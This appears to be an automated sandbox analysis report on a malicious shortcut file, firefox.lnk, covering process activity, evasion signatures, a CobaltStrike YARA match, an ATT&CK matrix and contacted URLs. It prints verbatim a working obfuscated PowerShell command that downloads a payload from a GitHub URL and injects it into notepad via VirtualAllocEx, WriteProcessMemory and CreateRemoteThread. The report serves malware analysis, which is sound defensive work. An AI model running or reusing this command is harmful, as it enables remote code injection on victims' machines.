        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Users\desktop.iniJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
        Source: Binary string: e.pdb source: powershell.exe, 00000000.00000002.360991961.000001A63DCA1000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: System.Core.pdb source: powershell.exe, 00000000.00000002.360991961.000001A63DBDB000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: . .U.n.a.b.l.e. .t.o. .d.i.s.p.l.a.y. .R.T.C. .M.e.s.s.a.g.e.........R.u.n.-.T.i.m.e. .C.h.e.c.k. .F.a.i.l.u.r.e. .#.%.d. .-. .%.s...Unknown Filename........Unknown Module Name.....Run-Time Check Failure #%d - %s.Stack corrupted near unknown variable...p?.?....??.?....??.?....??.?.....?.?....Stack pointer corruption........Cast to smaller type causing loss of data.......Stack memory corruption.Local variable used before initialization.......Stack around _alloca corrupted..b.i.n.\.a.m.d.6.4.\.M.S.P.D.B.1.1.0...D.L.L.....RegOpenKeyExW...RegQueryValueExW........RegCloseKey.....S.O.F.T.W.A.R.E.\.W.o.w.6.4.3.2.N.o.d.e.\.M.i.c.r.o.s.o.f.t.\.V.i.s.u.a.l.S.t.u.d.i.o.\.1.1...0.\.S.e.t.u.p.\.V.C.......P.r.o.d.u.c.t.D.i.r.....PDBOpenValidate5....r...........???????????????????????????????????????????>????456789:;<=???????......... source: powershell.exe, 00000000.00000002.357207100.000001A635DC6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.357207100.000001A635FDF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.357207100.000001A635F4C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.357207100.000001A635EA9000.00000004.00000800.00020000.00000000.sdmp
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_00007FF9A5D479DE push eax; retf 0_2_00007FF9A5D479ED
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_00007FF9A5D479AE pushad ; retf 0_2_00007FF9A5D479DD
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\h4qpy1nu\h4qpy1nu.cmdline
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\h4qpy1nu\h4qpy1nu.cmdlineJump to behavior

        Persistence and Installation Behavior

        barindex
        Windows shortcut file (LNK) starts blacklisted processes
        Source: LNK fileProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeFile created: C:\Users\user\AppData\Local\Temp\h4qpy1nu\h4qpy1nu.dllJump to dropped file
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 9816Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1380Thread sleep time: -8301034833169293s >= -30000sJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\h4qpy1nu\h4qpy1nu.dllJump to dropped file
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
        Source: powershell.exe, 00000000.00000002.361677867.000001A63DDB8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior

        HIPS / PFW / Operating System Protection Evasion

        barindex
        Compiles code for process injection (via .Net compiler)
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile written: C:\Users\user\AppData\Local\Temp\h4qpy1nu\h4qpy1nu.0.csJump to dropped file
        .NET source code references suspicious native API functions
        Source: h4qpy1nu.dll.2.dr, y.csReference to suspicious API methods: ('VirtualAllocEx', 'VirtualAllocEx@kernel32.dll'), ('WriteProcessMemory', 'WriteProcessMemory@kernel32.dll'), ('CreateRemoteThread', 'CreateRemoteThread@kernel32.dll')
        Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" function /{([int[]][char[]]$args[0]|%{[char]($_-4)})-join''};$c =/ '_hppmqtsvx,&oivrip762hpp&-atyfpmg$wxexmg$i|xivr$mrxtxv$zmvxyepeppsgi|,mrxtxv$e0$mrxtxv$f0$ymrx$g0$ymrx$h0$ymrx$i-? _hppmqtsvx,&oivrip762hpp&-atyfpmg$wxexmg$i|xivr$fssp$[vmxitvsgiwwqiqsv},mrxtxv$e0$mrxtxv$f0$f}xi_a$g0$ymrx$h0$syx$mrx$i-? _hppmqtsvx,&oivrip762hpp&-atyfpmg$wxexmg$i|xivr$mrxtxv$gviexiviqsxixlvieh,mrxtxv$e0$mrxtxv$f0$ymrx$g0$mrxtxv$h0$mrxtxv$i0$ymrx$j0$syx$mrxtxv$k-?';add-type -name y -names x -m $c;$h = [system.diagnostics.process]::getprocessbyid((ps notepad).id[0]).handle;$a = [x.y]::(/ 'zmvxyepeppsgi|')($h, 0, 0x100000, 0x1000, 0x40);$d = (iwr github.com/john-xor/temp/blob/main/index.html?raw=true).content;$n = 0;$t = 0;[x.y]::(/ '[vmxitvsgiwwqiqsv}')($h, $a, $d, $d.length, [ref] $n);[x.y]::(/ 'gviexiviqsxixlvieh')($h, 0, 0, $a, 0, 0, [ref] $t);
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\h4qpy1nu\h4qpy1nu.cmdlineJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES9A43.tmp" "c:\Users\user\AppData\Local\Temp\h4qpy1nu\CSCE97AB74AE4304D2FB93613F88A1756.TMP"Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC\Microsoft.mshtml\7.0.3300.0__b03f5f7f11d50a3a\Microsoft.mshtml.dll VolumeInformationJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

        Remote Access Functionality

        barindex
        Yara detected CobaltStrike
        Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 5336, type: MEMORYSTR
        Source: Yara matchFile source: 00000000.00000002.357207100.000001A635DC6000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000000.00000002.357207100.000001A635D88000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000000.00000002.357207100.000001A635FDF000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000000.00000002.357207100.000001A635F4C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000000.00000002.357207100.000001A635EA9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000000.00000002.357207100.000001A635C10000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

        Mitre Att&ck Matrix

        Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
        Valid Accounts1
        Command and Scripting Interpreter        		Path Interception111
        Process Injection        		21
        Virtualization/Sandbox Evasion        		OS Credential Dumping1
        Security Software Discovery        		Remote Services1
        Archive Collected Data        		Exfiltration Over Other Network Medium11
        Encrypted Channel        		Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
        Default Accounts1
        Native API        		Boot or Logon Initialization ScriptsBoot or Logon Initialization Scripts111
        Process Injection        		LSASS Memory11
        Process Discovery        		Remote Desktop ProtocolData from Removable MediaExfiltration Over Bluetooth1
        Ingress Tool Transfer        		Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
        Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)1
        Obfuscated Files or Information        		Security Account Manager21
        Virtualization/Sandbox Evasion        		SMB/Windows Admin SharesData from Network Shared DriveAutomated Exfiltration2
        Non-Application Layer Protocol        		Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
        Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Binary PaddingNTDS1
        Application Window Discovery        		Distributed Component Object ModelInput CaptureScheduled Transfer13
        Application Layer Protocol        		SIM Card SwapCarrier Billing Fraud
        Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptSoftware PackingLSA Secrets1
        Remote System Discovery        		SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
        Replication Through Removable MediaLaunchdRc.commonRc.commonSteganographyCached Domain Credentials1
        File and Directory Discovery        		VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
        External Remote ServicesScheduled TaskStartup ItemsStartup ItemsCompile After DeliveryDCSync12
        System Information Discovery        		Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact

        Behavior Graph

        Hide Legend

        Legend:

        • Process
        • Signature
        • Created File
        • DNS/IP Info
        • Is Dropped
        • Is Windows Process
        • Number of created Registry Values
        • Number of created Files
        • Visual Basic
        • Delphi
        • Java
        • .Net C# or VB.NET
        • C, C++ or other language
        • Is malicious
        • Internet

        Screenshots

        Thumbnails

        This section contains all screenshots as thumbnails, including those not shown in the slideshow.


        windows-stand

        Antivirus, Machine Learning and Genetic Malware Detection

        Initial Sample

        SourceDetectionScannerLabelLink
        firefox.lnk6%ReversingLabs
        firefox.lnk7%VirustotalBrowse

        Dropped Files

        No Antivirus matches

        Unpacked PE Files

        No Antivirus matches

        Domains

        SourceDetectionScannerLabelLink
        raw.githubusercontent.com1%VirustotalBrowse

        URLs

        SourceDetectionScannerLabelLink
        https://render.githubusercontent.com0%URL Reputationsafe
        http://pesterbdd.com/images/Pester.png0%URL Reputationsafe
        https://contoso.com/License0%URL Reputationsafe
        https://contoso.com/Icon0%URL Reputationsafe
        https://contoso.com/0%URL Reputationsafe
        https://oneget.orgX0%URL Reputationsafe
        https://oneget.orgformat.ps1xmlagement.dll2040.missionsand0%URL Reputationsafe
        https://oneget.org0%URL Reputationsafe
        https://raw.githubusercontent.comH0%Avira URL Cloudsafe
        https://raw.githubusercontent.com0%Avira URL Cloudsafe
        https://raw.githubusercontent.com/john-xor/temp/main/index.html0%Avira URL Cloudsafe
        http://raw.githubusercontent.com0%Avira URL Cloudsafe
        https://raw.githubusercontent.com1%VirustotalBrowse
        http://127.0.0.1:%u/0%Avira URL Cloudsafe
        https://github.comx0%Avira URL Cloudsafe
        https://raw.githubusercont0%Avira URL Cloudsafe

        Domains and IPs

        Contacted Domains

        NameIPActiveMaliciousAntivirus DetectionReputation
        github.com
        		140.82.121.3
        		truefalse
          		high
          raw.githubusercontent.com
          		185.199.108.133
          		truetrueunknown

          Contacted URLs

          NameMaliciousAntivirus DetectionReputation
          http://github.com/john-xor/temp/blob/main/index.html?raw=truefalse
            		high
            https://github.com/john-xor/temp/raw/main/index.htmlfalse
              		high
              https://github.com/john-xor/temp/blob/main/index.html?raw=truefalse
                		high
                https://raw.githubusercontent.com/john-xor/temp/main/index.htmltrue
                • Avira URL Cloud: safe
                		unknown

                URLs from Memory and Binaries

                NameSourceMaliciousAntivirus DetectionReputation
                http://nuget.org/NuGet.exepowershell.exe, 00000000.00000002.323735392.000001A6285C8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.357207100.000001A635C10000.00000004.00000800.00020000.00000000.sdmpfalse
                  		high
                  http://www.apache.org/licenses/LICENSE-2.0powershell.exe, 00000000.00000002.323735392.000001A628376000.00000004.00000800.00020000.00000000.sdmpfalse
                    		high
                    https://raw.githubusercontent.comHpowershell.exe, 00000000.00000002.323735392.000001A626108000.00000004.00000800.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    		unknown
                    https://render.githubusercontent.compowershell.exe, 00000000.00000002.323735392.000001A626108000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.323735392.000001A626D87000.00000004.00000800.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    		unknown
                    http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000000.00000002.323735392.000001A6283B7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.323735392.000001A628376000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.323735392.000001A6283FC000.00000004.00000800.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    		unknown
